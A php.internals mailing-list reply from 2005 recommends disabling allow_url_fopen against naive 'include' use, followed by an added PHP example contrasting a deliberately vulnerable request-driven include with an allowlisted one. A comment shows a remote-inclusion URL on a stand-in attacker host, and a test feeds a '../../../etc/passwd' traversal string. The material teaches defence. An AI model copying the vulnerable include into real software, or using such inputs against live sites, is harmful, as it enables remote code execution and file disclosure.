Newsgroups: php.internals
Xref: news.php.net php.internals:16898
Mailing-List: contact internals-help@lists.php.net; run by ezmlm
Message-ID: <6C.55.22648.2627CB24@pb1.pair.com>
To: internals@lists.php.net
Date: Fri, 24 Jun 2005 13:51:47 -0700
User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206)
References: <20050624055017.25065.qmail@desk.crynwr.com>
In-Reply-To: <20050624055017.25065.qmail@desk.crynwr.com>
Subject: Re: 'include' Considered Harmful
From: unknown@simplemachines.org ("Unknown W. Brackets")

Why not simply disable allow_url_fopen on your server or servers? With it set off, you get these errors:

Warning: main() [function.main]: URL file-access is disabled in the server configuration in .../test.php on line 3
Warning: main(http://www.google.com/) [function.main]: failed to open stream: no suitable wrapper could be found in .../test.php on line 3
Warning: main() [function.include]: Failed opening 'http://www.google.com/' for inclusion (include_path='.') in .../test.php on line 3

Now, yes, some scripts work better with that setting on, but it is *the* setting to disable if you're worried about naive programmers. You can even allow them to turn it back on with Apache's .htaccess.

-[Unknown]

> I believe that the 'include' operator is intrinsically harmful. As
> evidence I introduce three exhibits: Google for "php security flaw".
> The very first page you find will explain how a very common use of
> 'include' is insecure. As the second bit of evidence, I introduce the
> fact that both of the naive php programmers working on my server introduced
> this security flaw in separate web pages. As the third bit of
> evidence, I point out that crackers have created security tools
> designed specifically to exploit this flaw.
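The two sides of this thread in working code, as an added example that is not part of the original post or of PHP's own documentation: the naive `include $_GET[...]` pattern the quoted message is complaining about, beside an allowlisted version that is safe regardless of the allow_url_fopen setting. The ini and httpd.conf fragments in the leading comment are illustrative; note that allow_url_fopen is a PHP_INI_SYSTEM directive, so it is set in php.ini or in httpd.conf (php_admin_flag), and that PHP 5.2 and later also gate include/require of URL wrappers with the separate allow_url_include directive (off by default). The page names (`home`, `about`, `contact`), the `PAGES` map and the helper functions are all assumptions made for the example.

```php
<?php
// Added example, not code from the php.internals thread. Shows the naive
// include pattern the thread is about next to an allowlisted replacement.
//
// Server-side setting discussed in the post (illustrative fragments).
// allow_url_fopen is PHP_INI_SYSTEM: php.ini or httpd.conf, not .htaccess.
//
//   ; php.ini
//   allow_url_fopen   = Off
//   allow_url_include = Off   ; PHP >= 5.2, gates include/require of URLs
//
//   # httpd.conf
//   <Directory "/var/www/untrusted-site">
//       php_admin_flag allow_url_fopen Off
//   </Directory>

// 1. Naive pattern (deliberately vulnerable, kept as the thread describes it).
//    With allow_url_fopen on, ?page=http://attacker.example/code pulls remote
//    code into the process. Turning allow_url_fopen off stops the remote case
//    but not local file inclusion via "../" traversal.
function naive_include(string $page): void
{
    include $page . '.php';
}

// 2. Allowlisted version: the request parameter selects a key, never a path.
//    (Hypothetical page set for this example.)
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path to include, or null if the request is rejected.
function resolve_page(string $requested, string $baseDir): ?string
{
    if (!isset(PAGES[$requested])) {
        return null;                         // unknown key: refuse, never guess
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // realpath() resolves symlinks and "..", so a file that escapes $baseDir
    // (for example via a symlink planted in the pages directory) is rejected.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function safe_include(string $requested, string $baseDir): bool
{
    $path = resolve_page($requested, $baseDir);
    if ($path === null) {
        http_response_code(404);
        return false;
    }
    include $path;
    return true;
}

// Runtime check of the setting the post recommends disabling. On PHP < 5.2
// allow_url_include does not exist (ini_get() returns false), so only
// allow_url_fopen decides; on later versions both must be on for a URL
// to be includable.
function url_includes_possible(): bool
{
    $fopen = filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
    $inc   = ini_get('allow_url_include');
    return $inc === false ? $fopen
                          : ($fopen && filter_var($inc, FILTER_VALIDATE_BOOLEAN));
}

// Offline self-check on a constructed temporary page directory.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . uniqid();
    mkdir($dir);
    foreach (PAGES as $file) {
        file_put_contents("$dir/$file", "<?php echo 'ok';\n");
    }
    var_dump(resolve_page('home', $dir));                    // path inside $dir
    var_dump(resolve_page('../../../etc/passwd', $dir));    // rejected
    var_dump(resolve_page('http://www.google.com/', $dir)); // rejected
    var_dump(url_includes_possible());                      // this host's ini
    foreach (PAGES as $file) {
        unlink("$dir/$file");
    }
    rmdir($dir);
}
```

Run it with `php example.php`; the two rejected inputs return null without ever touching the filesystem, and the last line reports whether the host's php.ini would still let a URL be included at all.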